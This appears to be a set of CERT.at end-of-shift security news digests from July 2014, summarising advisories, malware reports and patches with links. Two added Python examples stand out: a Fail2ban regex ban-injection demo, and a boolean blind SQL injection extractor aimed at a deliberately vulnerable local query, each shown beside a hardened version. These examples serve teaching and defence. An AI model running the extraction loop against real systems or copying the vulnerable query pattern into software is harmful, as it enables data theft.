http://xforce.iss.net/xforce/xfdb/94724
*** OleumTech WIO Family Vulnerabilities ***
---------------------------------------------
Security researchers Lucas Apa and Carlos Mario Penagos Hollman of IOActive have identified multiple vulnerabilities in OleumTech's WIO family including the sensors and the DH2 data collector. The researchers have coordinated the vulnerability details with NCCIC/ICS-CERT and OleumTech in hopes the vendor would develop security patches to resolve these vulnerabilities. While ICS-CERT has had many discussions with both OleumTech and IOActive this past year, there has not been consensus...
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-202-01
*** Bugtraq: Web Login Bruteforce in Symantec Endpoint Protection Manager 12.1.4023.4080 ***
---------------------------------------------
http://www.securityfocus.com/archive/1/532857
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 18-07-2014 18:00 − Monday 21-07-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** The Little Signature That Could: The Curious Case of CZ Solution ***
---------------------------------------------
Malware authors are always looking for new ways to masquerade their actions. Attackers are looking for their malware to be not only fully undetectable, but also appear valid on a system, so as not to draw attention. Digital signatures are...
---------------------------------------------
http://www.fireeye.com/blog/technical/2014/07/the-little-signature-that-cou…
*** Keeping the RATs out: the trap is sprung - Part 3, (Sat, Jul 19th) ***
---------------------------------------------
As we bring our three-part series on RAT tools suffered upon our friends at Hazrat Supply we must visit the centerpiece of it all. The big dog in this fight is indeed the bybtt.cc3 file (Jake suspected this), Backdoor:Win32/Zegost.B. The file is unquestionably a PE DLL but renamed to .cc3 to hide on the system like a CueCards Professional database file. Based on the TrendMicro writeup on this family, the backdoor drops four files, including %Program Files%\%SESSIONNAME%\{random characters}.cc3 This...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18415&rss
*** Top 10 Common Database Security Issues ***
---------------------------------------------
Introduction: The database typically contains the crown jewels of any environment; it usually holds the most business sensitive information, which is why it is a high priority target for any attacker. The purpose of this post is to create awareness among database administrators and security managers about some of the areas on which it is important to focus when implementing a new database or hardening the security of an existing one.
---------------------------------------------
https://www.nccgroup.com/en/blog/2014/07/top-10-common-database-security-is…
*** Smart Meter Attack Scenarios ***
---------------------------------------------
In our previous post, we looked at how smart meters were being introduced across multiple countries and regions, and why these devices pose security risks to their users. At their heart, a smart meter is simply... a computer. Let's look at our existing computers - whether they are PCs, smartphones, tablets, or embedded devices. Similarly, these...
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/smart-meter-atta…
*** Attacks on web servers via the WordPress plugin MailPoet ***
---------------------------------------------
Servers are currently being systematically hijacked through a recently discovered security hole. Anyone who has not yet installed the update published at the beginning of July should do so urgently.
---------------------------------------------
http://www.heise.de/security/meldung/Angriffe-auf-Web-Server-via-Wordpress-…
*** Home router security to be tested in upcoming hacking contest ***
---------------------------------------------
Researchers are gearing up to hack an array of different home routers during a contest next month at the Defcon 22 security conference. The contest is called SOHOpelessly Broken - a nod to the small office/home office space targeted by the products - and follows a growing number of large scale attacks this year against routers and other home embedded systems.
---------------------------------------------
http://www.cio.com/article/2455981/home-router-security-to-be-tested-in-upc…
*** Security researcher points to "backdoors" in iOS ***
---------------------------------------------
Undocumented system services in iOS make it easy for attackers to read out user data once the iPhone or iPad has been locally paired with a desktop computer, explains Jonathan Zdziarski - and he hopes for a response from Apple.
---------------------------------------------
http://www.heise.de/security/meldung/Sicherheitsforscher-weist-auf-Hintertu…
*** Call for last-minute papers for VB2014 announced ***
---------------------------------------------
Seven speaking slots waiting to be filled with presentations on hot security topics.
---------------------------------------------
http://www.virusbtn.com/news/2014/07_21.xml?rss
*** Heartbleed threatens critical industrial control systems ***
---------------------------------------------
More than three months after the massive security hole became known, numerous Siemens systems are still unprotected.
---------------------------------------------
http://futurezone.at/digital-life/heartbleed-bedroht-kritische-industrie-ko…
*** VMSA-2014-0006.8 ***
---------------------------------------------
VMware product updates address OpenSSL security vulnerabilities
---------------------------------------------
http://www.vmware.com/security/advisories/VMSA-2014-0006.html
*** EMC RecoverPoint Internal Firewall Ruleset Error Lets Remote Users Bypass the Firewall ***
---------------------------------------------
http://www.securitytracker.com/id/1030608
*** DSA-2981 polarssl ***
---------------------------------------------
security update
---------------------------------------------
http://www.debian.org/security/2014/dsa-2981
*** DSA-2982 ruby-activerecord-3.2 ***
---------------------------------------------
security update
---------------------------------------------
http://www.debian.org/security/2014/dsa-2982
*** IBM Security Bulletins ***
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…
*** VU#688812: Huawei E355 contains a stored cross-site scripting vulnerability ***
---------------------------------------------
Vulnerability Note VU#688812: Huawei E355 contains a stored cross-site scripting vulnerability
Original Release date: 21 Jul 2014 | Last revised: 21 Jul 2014
Overview: The Huawei E355 built-in web interface contains a stored cross-site scripting vulnerability.
Description: Huawei E355 wireless broadband modems include a web interface for administration and additional services. The web interface allows users to receive SMS messages using the connected cellular network. CWE-79: Improper...
---------------------------------------------
http://www.kb.cert.org/vuls/id/688812
*** Bugtraq: CVE-2014-4326 Remote command execution in Logstash zabbix and nagios_nsca outputs. ***
---------------------------------------------
Vendor: Elasticsearch
Product: Logstash
CVE: CVE-2014-4326
Affected versions: Logstash 1.0.14 through 1.4.1
---------------------------------------------
http://www.securityfocus.com/archive/1/532841
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 17-07-2014 18:00 − Friday 18-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** SQL Injection Vulnerability - vBulletin 5.x ***
---------------------------------------------
The vBulletin team just released a security patch for vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1, and 5.1.2 to address a SQL injection vulnerability on the member list page. Every vBulletin user needs to upgrade to the latest version asap. vBulletin is a very popular forum software used on more than ..
---------------------------------------------
http://blog.sucuri.net/2014/07/sql-injection-on-vbulletin-5-x.html
*** Siemens OpenSSL Vulnerabilities ***
---------------------------------------------
Siemens has identified four vulnerabilities in its OpenSSL cryptographic software library affecting several Siemens industrial products. Updates are available for APE 2.0.2 and WinCC OA (PVSS). The ROX 1, ROX 2, S7-1500, and CP1543-1 products do not have a patch at this time; however, Siemens has made mitigation recommendations. Siemens is continuing to work on patching these vulnerabilities.
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-198-03
*** Cogent DataHub Code Injection Vulnerability ***
---------------------------------------------
NCCIC/ICS-CERT has become aware of a code injection vulnerability affecting the Cogent DataHub application produced by Cogent Real-Time Systems, Inc. (hereafter referred to as Cogent). Security researcher John Leitch reported this vulnerability to the Zero Day Initiative (ZDI), who then reported it directly to Cogent. Successful exploitation of this vulnerability could allow remote execution of arbitrary code.
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-198-01
*** Advantech WebAccess Vulnerabilities ***
---------------------------------------------
NCCIC/ICS-CERT received a report from the Zero Day Initiative (ZDI) concerning vulnerabilities affecting the Advantech WebAccess application. These vulnerabilities were reported to ZDI by security researchers Dave Weinstein, Tom Gallagher, John Leitch, and others. Advantech has produced an updated software version that mitigates these vulnerabilities.
---------------------------------------------
http://ics-cert.us-cert.gov//advisories/ICSA-14-198-02
*** Mitigating UAF Exploits with Delay Free for Internet Explorer ***
---------------------------------------------
After introducing the 'isolated heap' in the June security patch for Internet Explorer, Microsoft has once again introduced several improvements in the July patch for Internet Explorer. The most interesting and smart improvement is one which we will call 'delay free.' This improvement is designed to mitigate Use After Free (UAF) vulnerability exploits ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/mitigating-uaf-e…
*** DSA-2979 fail2ban ***
---------------------------------------------
Two vulnerabilities were discovered in Fail2ban, a solution to ban hosts that cause multiple authentication errors. When using Fail2ban to monitor Postfix or Cyrus IMAP logs, improper input validation in log parsing could enable a remote attacker to trigger an IP ban on arbitrary addresses, resulting in denial of service.
---------------------------------------------
http://www.debian.org/security/2014/dsa-2979
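The failure mode behind DSA-2979, as an added Python example that is not Fail2ban's own code and not the filter definitions the advisory fixed: a log-ban filter extracts the offending IP from a log line with a regular expression, and if that expression is loose enough to let the host group latch onto attacker-controlled text (the HELO string or sender address in a Postfix rejection line), the remote client decides which address gets banned. The two patterns, the sample log lines and the minimal ban counter below are constructed stand-ins written for this example; real Fail2ban filters use a `<HOST>` placeholder inside `failregex`, and the exact pre- and post-fix patterns are in the advisory's referenced commits, not here.

```python
import ipaddress
import re
from collections import Counter

# Constructed Postfix-style smtpd lines, not real log data. Both come from the
# same client 203.0.113.5; in the second one the attacker-chosen HELO string
# carries a bracketed IP of a victim host (198.51.100.7) that never connected.
SAMPLE_LOG = [
    "Aug 11 10:00:01 mx postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[203.0.113.5]: "
    "554 5.7.1 <bob@example.net>: Relay access denied; from=<alice@example.org> "
    "to=<bob@example.net> proto=ESMTP helo=<mail.example.org>",
    "Aug 11 10:00:02 mx postfix/smtpd[2231]: NOQUEUE: reject: RCPT from unknown[203.0.113.5]: "
    "554 5.7.1 <bob@example.net>: Relay access denied; from=<alice@example.org> "
    "to=<bob@example.net> proto=ESMTP helo=<x[198.51.100.7]>",
]

# Loose pattern (hypothetical, the weak form): the greedy ".*" lets the host
# group bind to the LAST "[a.b.c.d]" on the line, wherever the client put it.
LOOSE_FAILREGEX = re.compile(
    r"reject: RCPT from .*\[(?P<host>\d{1,3}(?:\.\d{1,3}){3})\]"
)

# Anchored pattern (hypothetical, the hardened form): the host must be the
# bracketed address Postfix itself writes right after "RCPT from <rdns>",
# terminated by ": ". Nothing free-form may sit between the anchor and the host.
STRICT_FAILREGEX = re.compile(
    r"reject: RCPT from [^\s\[\]]+\[(?P<host>\d{1,3}(?:\.\d{1,3}){3})\]: "
)


def extract_host(line, failregex):
    """Return the IP a filter would extract from one log line, or None if no match."""
    m = failregex.search(line)
    if not m:
        return None
    host = m.group("host")
    try:
        ipaddress.ip_address(host)  # belt and braces: never ban something that is not an address
    except ValueError:
        return None
    return host


def bans_after(lines, failregex, maxretry=1):
    """Replay lines through a minimal ban counter; return the hosts that would be banned."""
    hits = Counter(h for h in (extract_host(l, failregex) for l in lines) if h)
    return {host for host, n in hits.items() if n >= maxretry}


if __name__ == "__main__":
    print("loose :", sorted(bans_after(SAMPLE_LOG, LOOSE_FAILREGEX)))
    print("strict:", sorted(bans_after(SAMPLE_LOG, STRICT_FAILREGEX)))
```

The loose pattern bans the victim address from the crafted HELO as well as the real client; the anchored pattern bans only the connecting client. The same review applies to any filter that captures from free text: the host group must be tied to a field the daemon writes itself, and whatever precedes it must not be an unbounded wildcard.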
*** Bugtraq: Microsoft MSN HBE - Blind SQL Injection Vulnerability ***
---------------------------------------------
A boolean-based blind SQL injection web vulnerability has been detected in the official MSN (habitos.be.msn.com) web application service. The vulnerability allows remote attackers to inject their own SQL commands to compromise the affected ..
---------------------------------------------
http://www.securityfocus.com/archive/1/532830
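What "boolean-based blind" means in practice, as an added example that is not from the Bugtraq post and is not modelled on the MSN application: a constructed SQLite-backed lookup that concatenates user input into the query next to the parameterised form, and an oracle loop that recovers a stored value one character at a time using nothing but the application's "found / not found" answer. The table, column names and data are invented for this example.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for an application backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")
    conn.execute("INSERT INTO users VALUES (2, 'guest', 'x')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """Deliberately vulnerable: the input is spliced into the SQL text, so a
    condition appended by the caller becomes part of the WHERE clause."""
    row = conn.execute("SELECT name FROM users WHERE id = " + user_id).fetchone()
    return row is not None  # the only thing the 'page' reveals: found or not found


def lookup_safe(conn, user_id):
    """Hardened: validate the shape, then bind the value as a parameter so it
    can never change the structure of the query."""
    if not user_id.isdigit():
        return False
    row = conn.execute("SELECT name FROM users WHERE id = ?", (int(user_id),)).fetchone()
    return row is not None


def blind_extract(oracle, column, table, rowid=1,
                  charset="0123456789abcdefghijklmnopqrstuvwxyz", max_len=16):
    """Recover <column> of row <rowid> from <table> through a true/false oracle.
    Each probe asks one yes/no question: is character <pos> equal to <ch>?"""
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = (f"1 AND SUBSTR((SELECT {column} FROM {table} "
                       f"WHERE id={rowid}),{pos},1)='{ch}'")
            if oracle(payload):
                out += ch
                break
        else:
            break  # no character matched: we ran past the end of the value
    return out


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", blind_extract(lambda p: lookup_vulnerable(db, p), "secret", "users"))
    print("safe      :", repr(blind_extract(lambda p: lookup_safe(db, p), "secret", "users")))
```

Against the concatenating lookup the loop leaks the whole value with one request per candidate character; against the parameterised lookup every probe fails the digit check and nothing comes back. A real page usually leaks the boolean through a content difference or a timing difference rather than a literal true/false, but the search is the same.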
*** Critroni Crypto Ransomware Seen Using Tor for Command and Control ***
---------------------------------------------
There's a new kid on the crypto ransomware block, known as Critroni, that's been sold in underground forums for the last month or so and is now being dropped by the Angler exploit kit. The ransomware includes a number of unusual features and researchers say ..
---------------------------------------------
http://threatpost.com/critroni-crypto-ransomware-seen-using-tor-for-command…
*** LibreSSL: Linux and OpenBSD developers learn to get along ***
---------------------------------------------
The problems encountered while porting LibreSSL to other platforms such as Linux show how OpenSSL could turn into such a security nightmare. And that nightmare is far from over.
---------------------------------------------
http://www.heise.de/security/meldung/LibreSSL-Linuxer-und-OpenBSDler-raufen…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 16-07-2014 18:00 − Thursday 17-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Critical vulnerability endangers Cisco routers and modems ***
---------------------------------------------
Nine consumer routers and cable modems from Cisco are vulnerable to a critical flaw that allows remote attackers on the network to hijack the device. German providers also deploy the affected models.
---------------------------------------------
http://www.heise.de/security/meldung/Kritische-Sicherheitsluecke-gefaehrdet…
*** Cisco Wireless Residential Gateway Remote Code Execution Vulnerability ***
---------------------------------------------
A vulnerability in the web server used in multiple Cisco Wireless Residential Gateway products could allow an unauthenticated, remote attacker to exploit a buffer overflow and cause arbitrary code execution.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/ciscos…
*** Cisco Cable Modem Buffer Overflow Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
A remote user can send a specially crafted HTTP request to the target device to trigger a buffer overflow and execute arbitrary code on the target system.
---------------------------------------------
http://www.securitytracker.com/id/1030598
*** Apache httpd mod_status Heap Buffer Overflow Remote Code Execution Vulnerability ***
---------------------------------------------
The specific flaw exists within the updating of mod_status. A race condition in mod_status allows an attacker to disclose information or corrupt memory with several concurrent requests to endpoints served by the server-status handler and to other endpoints. By abusing this flaw, an attacker can possibly disclose credentials or leverage this situation to achieve remote code execution.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-14-236/
*** Additional information on the interview in Der Standard ***
---------------------------------------------
Additional information on the interview in Der Standard, 16 July 2014. We are (almost) always pleased when we are quoted in the media, since that reaches a much broader audience than our direct channels (website, RSS, mail, Twitter) alone. The catch: interviews usually have to be done quickly, journalists work to hard daily deadlines, and on paper space is limited and there are no hyperlinks. So I want to give a bit of context here on the interview that ..
---------------------------------------------
http://www.cert.at/services/blog/20140716101643-1199.html
*** SA-CORE-2014-003 - Drupal core - Multiple vulnerabilities ***
---------------------------------------------
Multiple vulnerabilities were fixed in the supported Drupal core versions 6 and 7. (Denial of Service, Cross Site Scripting, Access Bypass)
---------------------------------------------
https://www.drupal.org/SA-CORE-2014-003
*** SA-CONTRIB-2014-071 - FileField - Access bypass ***
---------------------------------------------
A vulnerability was discovered in the FileField third-party module that could allow attackers to gain access to private files.
---------------------------------------------
https://www.drupal.org/node/2304561
*** Barely introduced, already changed: Apple improves iCloud mail encryption ***
---------------------------------------------
Only a few days after introducing transport encryption for Apple's iCloud mail services, the company is already making improvements. At least some servers now meet current requirements for good encryption.
---------------------------------------------
http://www.heise.de/security/meldung/Kaum-eingefuehrt-schon-umgestellt-Appl…
*** Pushdo Trojan outbreak: 11 THOUSAND systems infected in just 24 hours ***
---------------------------------------------
A wave of attacks by cybercrooks pushing a new variant of the resilient Pushdo Trojan has compromised more than 11,000 systems in just 24 hours.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/07/17/pushdo_troj…
*** Paper: Mayhem - a hidden threat for *nix web servers ***
---------------------------------------------
A new kind of malware has the functions of a traditional Windows bot, but can act under restricted privileges in the system.
---------------------------------------------
http://www.virusbtn.com/news/2014/07_17.xml
*** Havex, It's Down With OPC ***
---------------------------------------------
FireEye recently analyzed the capabilities of a variant of Havex (referred to by FireEye as 'Fertger' or 'PEACEPIPE'), the first publicized malware reported to actively scan OPC servers used for controlling SCADA (Supervisory Control and Data Acquisition) devices in ..
---------------------------------------------
http://www.fireeye.com/blog/technical/targeted-attack/2014/07/havex-its-dow…
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 15-07-2014 18:00 − Wednesday 16-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** SSL Black List Aims to Publicize Certificates Associated With Malware ***
---------------------------------------------
Malware and botnet operators are always adapting their tactics, trying to stay a step or two ahead of defensive technologies and techniques. One of the methods many attackers have adopted is using SSL to communicate with the infected machines they control, and a researcher has started a new ..
---------------------------------------------
http://threatpost.com/ssl-black-list-aims-to-publicize-certificates-associa…
*** Early Review of LibreSSL Finds Problematic PRNG ***
---------------------------------------------
A critical vulnerability was reported in the random number generator in LibreSSL, a fork of OpenSSL. LibreSSL preview versions were released this weekend.
---------------------------------------------
http://threatpost.com/early-review-of-libressl-finds-problematic-prng/107239
*** Critical Patch Update - July 2014 ***
---------------------------------------------
http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html
*** About Two Recently Patched IBM DB2 LUW Vulnerabilities ***
---------------------------------------------
IBM recently released patches for three security vulnerabilities affecting various versions of DB2 for Linux, Unix and Windows. This post will explore some more technical details of two of these vulnerabilities (CVE-2014-0907 and CVE-2013-6744) to help database administrators assess the risk of ..
---------------------------------------------
http://blog.spiderlabs.com/2014/07/about-two-ibm-db2-luw-vulnerabilities-pa…
*** Citrix XenServer Multiple Security Updates ***
---------------------------------------------
A number of security vulnerabilities have been identified in Citrix XenServer. These vulnerabilities affect all currently supported versions of Citrix ..
---------------------------------------------
http://support.citrix.com/article/CTX140984
*** Elipse E3 Scada PLC Denial Of Service ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070083
*** [2014-07-16] Multiple SSRF vulnerabilities in Alfresco Community Edition ***
---------------------------------------------
The Alfresco Community Edition Server is prone to multiple Server Side Request Forgery vulnerabilities allowing access to internal resources for an unauthenticated attacker.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** HP Data Protector, Remote Execution of Arbitrary Code ***
---------------------------------------------
A potential security vulnerability has been identified with HP Data Protector. This vulnerability could be remotely exploited to execute arbitrary code.
---------------------------------------------
http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl…
*** [2014-07-16] Remote Code Execution via CSRF in OpenVPN Access Server "Desktop Client" ***
---------------------------------------------
Remote attackers can execute arbitrary code and execute other attacks on computers with the OpenVPN Access Server "Desktop Client" installed.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** [2014-07-16] Multiple critical vulnerabilities in Bitdefender GravityZone ***
---------------------------------------------
Attackers are able to completely compromise the Bitdefender GravityZone solution as they can gain system and database level access.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** Vulnerability in Symfony: W0rm hacks Cnet ***
---------------------------------------------
The Russian hacker group W0rm has gained access to the servers of the news website Cnet. The hackers want to sell the database containing user data for the symbolic price of one bitcoin.
---------------------------------------------
http://www.golem.de/news/schwachstelle-in-symfony-w0rm-hackt-cnet-1407-1079…
*** Common Misconceptions IT Admins Have on Targeted Attacks ***
---------------------------------------------
In our efforts around addressing targeted attacks, we often work with IT administrators from different companies in dealing with threats against their network. During these collaborations, we've recognized certain misconceptions that IT administrators - or perhaps enterprises in general - have in terms of targeted attacks. I will cover some of them in this ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/common-misconcep…
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 14-07-2014 18:00 − Tuesday 15-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Introduction to Smart Meters ***
---------------------------------------------
While wearable personal technology may be the most 'public' face of the Internet of Everything, the most widespread use of it may be in smart meters. What is a smart meter, exactly? It's a meter for utilities (electricity, gas, or water) that records the consumption of the utility in question, and transmits it ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/introduction-to-…
*** Disclosure: Insecure Nonce Generation in WPtouch ***
---------------------------------------------
If you use the popular WPtouch plugin (5m+ downloads) on your WordPress website, you should update it immediately. During a routine audit for our WAF, we discovered a very dangerous vulnerability that could potentially allow a user with no administrative privileges, who was logged in ..
---------------------------------------------
http://blog.sucuri.net/2014/07/disclosure-insecure-nonce-generation-in-wpto…
*** Five Year Old Phishing Campaign Unveiled ***
---------------------------------------------
Details have been disclosed on a five-year-old phishing campaign in which attackers have pilfered victims' login credentials from Google, Yahoo, Facebook, Dropbox and Skype.
---------------------------------------------
http://threatpost.com/five-year-old-phishing-campaign-unveiled/107197
*** OpenVPN PrivateTunnel ptservice privilege escalation ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/94482
*** HP StoreVirtual Bugs Let Remote Users Obtain Information and Remote Authenticated Users Gain Elevated Privileges ***
---------------------------------------------
http://www.securitytracker.com/id/1030567
*** Citrix NetScaler Application Delivery Controller and NetScaler Gateway Multiple Security Updates ***
---------------------------------------------
A number of security vulnerabilities have been identified in the Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway, formerly known ..
---------------------------------------------
http://support.citrix.com/article/CTX140863
*** iCloud mail delivery now encrypted too ***
---------------------------------------------
As one of the last major mail providers, Apple has now enabled transport security against simple eavesdropping. The methods used, however, leave a lot to be desired.
---------------------------------------------
http://www.heise.de/security/meldung/iCloud-Mail-Versand-jetzt-auch-verschl…
*** OpenCart <= 1.5.6.4 (cart.php) PHP Object Injection Vulnerability ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070078
*** Oracle on the future of Java 7 under Windows XP ***
---------------------------------------------
Java 7 will receive security updates until April 2015 at the earliest. All further releases of the second-to-last Java version until then will continue to work on Windows XP, which Microsoft no longer officially supports.
---------------------------------------------
http://www.heise.de/security/meldung/Oracle-zur-Zukunft-von-Java-7-unter-Wi…
*** The 'Forbidden' Apple: App Stores and the Illusion of Control Part I ***
---------------------------------------------
There is no doubt we truly live in an 'App Economy.' From personal to professional, we direct and live our lives through our smart phones. But while we enjoy the latest games, stream the latest content or catch up on our friends activities, few think ..
---------------------------------------------
http://research.zscaler.com/2014/07/the-forbidden-apple-app-stores-and.html
*** And the mice will 'Play': App Stores and the Illusion of Control Part II ***
---------------------------------------------
In the last blog, we began analyzing what we've termed the 'App Dichotomy' of the App Economy - the fact that we are at least as much the consumed as we are the consumer. Our goal was to analyze popular apps from Apple's App Store and Google Play to ..
---------------------------------------------
http://research.zscaler.com/2014/07/and-mice-will-play-app-stores-and.html
*** Project Zero: Google builds an Internet security team ***
---------------------------------------------
With full-time developers in Project Zero, Google, which until now has pursued security research only on the side, wants to make the Internet safer and help the politically persecuted.
---------------------------------------------
http://www.golem.de/news/project-zero-google-baut-internet-sicherheitsteam-…
*** New Kronos Banking Malware Advertised On Russian Forums ***
---------------------------------------------
Researchers have spotted a new banking Trojan advertised for sale on Russian forums. Kronos promises features that help it evade detection and analysis, such as a Ring3 rootkit.
---------------------------------------------
http://threatpost.com/new-kronos-banking-malware-advertised-on-russian-foru…
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 11-07-2014 18:00 − Monday 14-07-2014 18:00
Handler: Alexander Riepl
Co-Handler: n/a
*** Oracle to release 115 security patches ***
---------------------------------------------
Oracle is planning to release 115 security patches for vulnerabilities affecting a wide array of its products, including its flagship database, Java SE, Fusion Middleware and business applications. The update includes fixes for 20 weaknesses in Java SE, all of which can be exploited by an attacker remotely, without the need for login credentials, ..
---------------------------------------------
http://www.cio.com/article/2453362/oracle-to-release-115-security-patches.h…
*** VU#917348: Datum Systems satellite modem devices contain multiple vulnerabilities ***
---------------------------------------------
The Datum Systems SnIP operating system on PSM-4500 and PSM-500 satellite modem devices has FTP enabled by default with no credentials required, which allows open access to sensitive areas of the file system. A remote unauthenticated attacker may be able to gain full control of the device.
---------------------------------------------
http://www.kb.cert.org/vuls/id/917348
*** Cisco ASA CIFS Share Enumeration Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability in the WebVPN Common Internet File System (CIFS) access function of Cisco Adaptive Security Appliance (ASA) could allow an authenticated, remote attacker to trigger a reload of the affected device.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013…
*** Juniper Junos Unspecified Command Line Interface Flaw Lets Local Users Gain Root Privileges ***
---------------------------------------------
A local user on the command line interface can invoke certain combinations of commands to gain root privileges on the target system.
---------------------------------------------
http://www.securitytracker.com/id/1030559
*** Dell Sonicwall Scrutinizer 11.01 Code Execution / SQL Injection ***
---------------------------------------------
Dell Sonicwall Scrutinizer suffers from several SQL injections, many of which can end up in remote code execution. An attacker needs to be authenticated, but not as an administrator. However, that wouldn't stop anyone, since there is also a privilege escalation vulnerability in that ..
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070065
*** Schrack MICROCONTROL XSS / Disclosure / Weak Default Password ***
---------------------------------------------
The Microcontrol emergency light system, distributed by Schrack Technik GmbH, is a self-contained emergency lighting system that is configurable over a web interface. Through the vulnerabilities described in this advisory an attacker can reconfigure the whole emergency light system without authentication. Furthermore he can perform attacks..
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070067
*** 'Gameover' malware returns from the dead ***
---------------------------------------------
In early June 2014, an internationally co-ordinated law enforcement effort against the criminals behind the infamous Gameover malware pretty much wiped out their botnet altogether. Bad news - it looks as though Gameover is back...
---------------------------------------------
http://nakedsecurity.sophos.com/2014/07/13/gameover-malware-returns-from-th…
*** Popular password protection programs p0wnable ***
---------------------------------------------
LastPass, RoboForm, My1Login, PasswordBox and NeedMyPassword all flawed. Researchers have detailed a series of quickly patched vulnerabilities in five popular password managers that could allow attackers to steal user credentials.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2014/07/14/popular_web…
*** Beware Keyloggers at Hotel Business Centers ***
---------------------------------------------
The U.S. Secret Service is advising the hospitality industry to inspect computers made available to guests in hotel business centers, warning that crooks have been compromising hotel business center PCs with keystroke-logging malware in a bid to steal personal and financial data from guests.
---------------------------------------------
http://krebsonsecurity.com/2014/07/beware-keyloggers-at-hotel-business-cent…
*** The Internet of Things: How do you "on-board" devices?, (Mon, Jul 14th) ***
---------------------------------------------
Certified pre-pw0ned devices are nothing new. We talked years ago about USB picture frames that came with malware pre-installed. But for the most part, the malware was added to the device accidentally, or for example by customers who later returned the device just to have it resold without adequately resetting/wiping the device. But more recently, more evidence emerged that ..
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18387&rss
*** Encryption: LibreSSL leaves the nest ***
---------------------------------------------
The developers of the OpenSSL fork LibreSSL have released the first version of their software that supports platforms other than OpenBSD. With this, the SSL library is on its way to becoming a real alternative to Heartbleed-plagued OpenSSL.
---------------------------------------------
http://www.heise.de/security/meldung/Verschluesselung-LibreSSL-wird-fluegge…
*** Understanding Ransomware ***
---------------------------------------------
Our Cyber Defence Operations team, led by David Cannings, has published a new whitepaper on understanding ransomware. It looks at the impact, evolution and defensive strategies that can be employed by organisations. While the paper is primarily focused on Microsoft Windows due to the historic ..
---------------------------------------------
https://www.nccgroup.com/en/blog/2014/07/understanding-ransomware/
*** VU#204988: Kaseya's agent driver contains NULL pointer dereference ***
---------------------------------------------
Kaseya's agent driver, kapfa.sys, is vulnerable to a NULL pointer dereference. A local authenticated attacker may be able to crash the application, thereby causing a denial of service. Kaseya has ..
---------------------------------------------
http://www.kb.cert.org/vuls/id/204988
*** WordPress Download Manager 2.6.8 Shell Upload ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070062
*** Shopizer 1.1.5 Code Execution / XSS / CSRF / Data Manipulation ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014070066
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 10-07-2014 18:00 − Friday 11-07-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Finding the Clowns on the Syslog Carousel, (Thu, Jul 10th) ***
---------------------------------------------
So often I see clients faithfully logging everything from the firewalls, routers and switches - taking terabytes of disk space to store it all. Sadly, the interaction after the logs are created is often simply to make sure that the partition doesn't fill up - either old logs are just deleted, or each month logs are burned to DVD and filed away. The comment I often get is that log entries are complex, and that the sheer volume of information makes it impossible to make sense of it.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=18373&rss
*** Security Advisory 2982792 released, Certificate Trust List updated ***
---------------------------------------------
Today, we are updating the Certificate Trust List (CTL) for all supported releases of Microsoft Windows to remove the trust of mis-issued third-party digital certificates. These certificates could be used to spoof content and perform phishing or man-in-the-middle attacks against web properties. With this update, most customers will be automatically protected against this issue and will not need to take any action. If you do not have automatic updates enabled, or if you are on Windows Server...
---------------------------------------------
